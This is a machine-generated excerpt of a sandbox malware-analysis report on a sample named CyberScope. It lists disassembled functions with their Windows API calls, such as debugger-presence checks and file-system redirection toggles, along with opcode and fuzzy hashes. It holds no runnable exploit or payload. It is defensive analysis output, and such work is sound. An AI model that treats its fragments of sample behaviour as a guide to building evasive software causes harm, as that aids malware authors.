                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentProcess$DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 1294930198-0
                                                                                    • Opcode ID: b079c737d5ad494bdc35e032919b01e62da938ae3f994f21447f54ebe2e53cce
                                                                                    • Instruction ID: 1d034512d3549d060403f8ba3714dc03d7e6643940693a18d63a9e3423b77bcc
                                                                                    • Opcode Fuzzy Hash: b079c737d5ad494bdc35e032919b01e62da938ae3f994f21447f54ebe2e53cce
                                                                                    • Instruction Fuzzy Hash: C9D02E3B010306BBD7220BD4FC0DF3B3B3CDBCAB22F004018F20886090CAB094128A31
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 001A3006
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID: CALL
                                                                                    • API String ID: 1385522511-4196123274
                                                                                    • Opcode ID: 94b5f8144c132512d25874eede61a4e7ffc099d7e32a9b54045120bc856c8a41
                                                                                    • Instruction ID: f565e32fcde4c3c95f6365cd33840b0f64fbfad10fc33f58a4aa69d8ea6ee3b7
                                                                                    • Opcode Fuzzy Hash: 94b5f8144c132512d25874eede61a4e7ffc099d7e32a9b54045120bc856c8a41
                                                                                    • Instruction Fuzzy Hash: 44229D746083419FD718DF18C884B2ABBF1BF9A314F24895DF49A8B3A2D771E941CB52
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseErrorHandleMode
                                                                                    • String ID:
                                                                                    • API String ID: 3953868439-0
                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction ID: e503d87d1ba34b969bfbda372e954cf33eb2decd65494f9699be08088e1b2d9f
                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction Fuzzy Hash: AC31D570A00105DFC71AEF58D490AAAFBB5FB59380B6586A5F409CB252DB32EDC1CBD0
                                                                                    APIs
                                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00193A3C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_
                                                                                    • String ID:
                                                                                    • API String ID: 1144537725-0
                                                                                    • Opcode ID: e04ff2ad5ea28964c1bc0b996e92870309c6ece8a850aadd2f485b337604489b
                                                                                    • Instruction ID: 728e0fa89b137529212ec052b9f05f1016568d4945c95f6136ccbbb2426f092c
                                                                                    • Opcode Fuzzy Hash: e04ff2ad5ea28964c1bc0b996e92870309c6ece8a850aadd2f485b337604489b
                                                                                    • Instruction Fuzzy Hash: 53317C70604701DFDB20DF24E889797BBE8BB49758F00092EF6D987241E7B5A958CB92
                                                                                    APIs
                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 001C4F04
                                                                                    • GetFileType.KERNELBASE(00000000), ref: 001C4F16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandleType
                                                                                    • String ID:
                                                                                    • API String ID: 3000768030-0
                                                                                    • Opcode ID: e7e704ca149d681e7825acd652ebfa8d255d93caa69fad2f6f294d2ee166a899
                                                                                    • Instruction ID: 6b997e0895c45adfe5cfd013ad74d335695701ad9244dbe7ddecf02207fc0ad5
                                                                                    • Opcode Fuzzy Hash: e7e704ca149d681e7825acd652ebfa8d255d93caa69fad2f6f294d2ee166a899
                                                                                    • Instruction Fuzzy Hash: FB11B17150C7414BC7348A3DACA8F22AAA4ABB6330B39071ED5B6C75F1C734DC82D650
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000018,00000FA0,?,00000000,?,001D3A00,00000000), ref: 00200AEC
                                                                                    • InterlockedExchange.KERNEL32(00000038,00000000), ref: 00200B0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                                    • String ID:
                                                                                    • API String ID: 4104817828-0
                                                                                    • Opcode ID: 605651e8a5de98322187ca9c7bbc4d81f6af4200259353d291ee230980308342
                                                                                    • Instruction ID: 97c45a97aab1f632bfd3d6b2a385d837a58becc7949c513fe9bef679b3403a2b
                                                                                    • Opcode Fuzzy Hash: 605651e8a5de98322187ca9c7bbc4d81f6af4200259353d291ee230980308342
                                                                                    • Instruction Fuzzy Hash: EAF017B1500705ABC320DF56D9489A7FBECFF94720B40491EE58687A61CBB4B485CF90
                                                                                    APIs
                                                                                    • IsThemeActive.UXTHEME ref: 0019333D
                                                                                      • Part of subcall function 001932E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001932FB
                                                                                      • Part of subcall function 001932E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00193312
                                                                                      • Part of subcall function 0019338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00193368,?), ref: 001933BB
                                                                                      • Part of subcall function 0019338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00193368,?), ref: 001933CE
                                                                                      • Part of subcall function 0019338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00262418,00262400,?,?,?,?,?,?,00193368,?), ref: 0019343A
                                                                                      • Part of subcall function 0019338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00262418,?,?,?,?,?,?,?,00193368,?), ref: 001934BB
                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00193377
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                                                                    • String ID:
                                                                                    • API String ID: 1550534281-0
                                                                                    • Opcode ID: 0d70c8d7b7d205ee30e2adcea81c365313eecd1aad51986c93e7bdacdc48fca0
                                                                                    • Instruction ID: b8aacc08b64c0f1df77c8a73dda008d101b2361eaf0fd3b1b5243873c64e630a
                                                                                    • Opcode Fuzzy Hash: 0d70c8d7b7d205ee30e2adcea81c365313eecd1aad51986c93e7bdacdc48fca0
                                                                                    • Instruction Fuzzy Hash: E2F08271954B44EFE711AFB0FC0FB6477A4B714709F008859F609962E2DBFA92698B40
                                                                                    APIs
                                                                                      • Part of subcall function 00201312: InterlockedExchange.KERNEL32(?,?), ref: 00201322
                                                                                      • Part of subcall function 00201312: EnterCriticalSection.KERNEL32(00000000,?), ref: 00201334
                                                                                      • Part of subcall function 00201312: TerminateThread.KERNEL32(00000000,000001F6), ref: 00201342
                                                                                      • Part of subcall function 00201312: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00201350
                                                                                      • Part of subcall function 00201312: CloseHandle.KERNEL32(00000000), ref: 0020135F
                                                                                      • Part of subcall function 00201312: InterlockedExchange.KERNEL32(?,000001F6), ref: 0020136F
                                                                                      • Part of subcall function 00201312: LeaveCriticalSection.KERNEL32(00000000), ref: 00201376
                                                                                    • CloseHandle.KERNELBASE(?,?,00200BBF), ref: 00200B5D
                                                                                    • DeleteCriticalSection.KERNEL32(?,?,00200BBF), ref: 00200B83
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 2929296749-0
                                                                                    • Opcode ID: df8bd9f1f569aaf0e3f749762b09bbfd882a7b5399df80cf3133f6f7558f9d4b
                                                                                    • Instruction ID: c359f4ea6da5267176e5a79b58ec0774b2f0ce7126be496c451075b0c0185f44
                                                                                    • Opcode Fuzzy Hash: df8bd9f1f569aaf0e3f749762b09bbfd882a7b5399df80cf3133f6f7558f9d4b
                                                                                    • Instruction Fuzzy Hash: F6E04F32020702EBC7356F64F849A86BFE4BF14315F2088AEF19A55872CB70A9E5CF44
                                                                                    APIs
                                                                                    • __Init_thread_footer.LIBCMT ref: 0019CEEE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer
                                                                                    • String ID:
                                                                                    • API String ID: 1385522511-0
                                                                                    • Opcode ID: 041d43943156177c276108800df96a446b554e7869335bfd8d996cea3df4a978
                                                                                    • Instruction ID: 8f41a63ecbb26ce0721a1699e9eb2bddb72252f57ca89ac5150231b0229c8767
                                                                                    • Opcode Fuzzy Hash: 041d43943156177c276108800df96a446b554e7869335bfd8d996cea3df4a978
                                                                                    • Instruction Fuzzy Hash: 9B32BE75A00245AFCF24CF59C884ABEBBF6FF49354F198059E846AB291C774AD81CBD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString
                                                                                    • String ID:
                                                                                    • API String ID: 2948472770-0
                                                                                    • Opcode ID: b6c837be0b0a5acbb86341d88cf7e449ef2b642370ea2e6e4fe2e7d494fd71e1
                                                                                    • Instruction ID: 6533c5a94946536a390ce6c0f16ce4e3fdcf11305a9d6f478e9f598b5e3845de
                                                                                    • Opcode Fuzzy Hash: b6c837be0b0a5acbb86341d88cf7e449ef2b642370ea2e6e4fe2e7d494fd71e1
                                                                                    • Instruction Fuzzy Hash: 38D17A74A1420AEFCF14EF98D4819EDBBF5FF68310F244059E915AB291DB30AE91CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6f47c87d6564563cbf67b2c27fe7af21345b4d97c7b351ee89defd4c55a35e56
                                                                                    • Instruction ID: 186fae1c6f136797201f78f38d116034db519679a16208913072959d525ba064
                                                                                    • Opcode Fuzzy Hash: 6f47c87d6564563cbf67b2c27fe7af21345b4d97c7b351ee89defd4c55a35e56
                                                                                    • Instruction Fuzzy Hash: 2051B175A00208AFDB14DF68CC44AE97BA2EB85364F19C1BCE8199B391D771ED43CB90
                                                                                    APIs
                                                                                      • Part of subcall function 0019663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0019668B,?,?,001962FA,?,00000001,?,?,00000000), ref: 0019664A
                                                                                      • Part of subcall function 0019663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0019665C
                                                                                      • Part of subcall function 0019663E: FreeLibrary.KERNEL32(00000000,?,?,0019668B,?,?,001962FA,?,00000001,?,?,00000000), ref: 0019666E
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,001962FA,?,00000001,?,?,00000000), ref: 001966AB
                                                                                      • Part of subcall function 00196607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001D5657,?,?,001962FA,?,00000001,?,?,00000000), ref: 00196610
                                                                                      • Part of subcall function 00196607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00196622
                                                                                      • Part of subcall function 00196607: FreeLibrary.KERNEL32(00000000,?,?,001D5657,?,?,001962FA,?,00000001,?,?,00000000), ref: 00196635
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                    • String ID:
                                                                                    • API String ID: 2632591731-0
                                                                                    • Opcode ID: 6fff4e920bfcb785f9cf049737276409bacf729b261c2d3bd1906b50daa50b53
                                                                                    • Instruction ID: 70a7baa047d14672c46c45a20082459e2edcf7124d0b1d4dda9d450969db6147
                                                                                    • Opcode Fuzzy Hash: 6fff4e920bfcb785f9cf049737276409bacf729b261c2d3bd1906b50daa50b53
                                                                                    • Instruction Fuzzy Hash: BC11E372600305AACF15AB70CC06BAD7BA59F60714F20442EF482A61C2EF71EA159B70
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wsopen_s
                                                                                    • String ID:
                                                                                    • API String ID: 3347428461-0
                                                                                    • Opcode ID: 99ef8be8482ffe154a0a7653903fae692bb87b209a0a3528a156ba4a66319429
                                                                                    • Instruction ID: d11941e04efee742f28449a048a295de5fb73bb77f3bdc3aca0b6322b8d3ba97
                                                                                    • Opcode Fuzzy Hash: 99ef8be8482ffe154a0a7653903fae692bb87b209a0a3528a156ba4a66319429
                                                                                    • Instruction Fuzzy Hash: 5311187590420AAFCF05DF98E985EDA7BF5EF58310F114069F809AB311DB31EA218B65
                                                                                    APIs
                                                                                      • Part of subcall function 001C4FF0: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001C319C,00000001,00000364,?,001B0165,?,?,002011D9,0000FFFF), ref: 001C5031
                                                                                    • _free.LIBCMT ref: 001C53DF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                    • Instruction ID: a49df5bc13ef4b612eabceb3bdc558fa9425c303648aecae8c8ba161def7e538
                                                                                    • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                    • Instruction Fuzzy Hash: 710126722003446BE3218F69D881E5AFBE9FBA5370F25051DE584832C0EB70E8458764
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                                    • Instruction ID: 9b6aa4e2ca2290450bbc65ef60706882410ffb4d90f1d1b78b38e1a180157661
                                                                                    • Opcode Fuzzy Hash: 4624603760d48ad0bd9b94422b8c27d6f3f6d6689bf5384beaeb8052d0d19255
                                                                                    • Instruction Fuzzy Hash: DEF0F43250062097D6353A6A9C01BEA37D88FA2338F11472AF821931D1EB70E80A86E2
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 176396367-0
                                                                                    • Opcode ID: e9cd17c5cbaedd8edb8b09e85265a98eb37cae1070fabcd04313bd3d0c823b07
                                                                                    • Instruction ID: aa8bb211db9527dd8d3aff4f89e84511dd00ab888339dcdb623bac80ffb76fdd
                                                                                    • Opcode Fuzzy Hash: e9cd17c5cbaedd8edb8b09e85265a98eb37cae1070fabcd04313bd3d0c823b07
                                                                                    • Instruction Fuzzy Hash: 20F0C2B36017047ED7159F29DC06BA7BB98EB547A0F51C22AFA19CB2D1DB31E5108BA0
                                                                                    APIs
                                                                                    • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0020F987
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190098753.000000000025D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_19_2_190000_CyberScope.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable
                                                                                    • String ID:
                                                                                    • API String ID: 1431749950-0
                                                                                    • Opcode ID: 6bafe1b3653d99d437d90b732d6fbc18d7589e4a1e5c699aa44c85f678bacd95
                                                                                    • Instruction ID: 2cb2e82683246726d8b7fafac94ccbe048c8c1c2e1ed3307666bd4ee1a430990
                                                                                    • Opcode Fuzzy Hash: 6bafe1b3653d99d437d90b732d6fbc18d7589e4a1e5c699aa44c85f678bacd95
                                                                                    • Instruction Fuzzy Hash: DDF03C72A00205BFCB15EBA5DC4AD9F77B8EF59720F004055F505AB261DB70EE51CB61
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001C319C,00000001,00000364,?,001B0165,?,?,002011D9,0000FFFF), ref: 001C5031
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000013.00000002.2189961420.0000000000191000.00000020.00000001.01000000.00000009.sdmp, Offset: 00190000, based on PE: true
                                                                                    • Associated: 00000013.00000002.2189924561.0000000000190000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.000000000022D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000013.00000002.2190033226.0000000000253000.00000002.00000001.01000000.00000009.sdmpDownload File
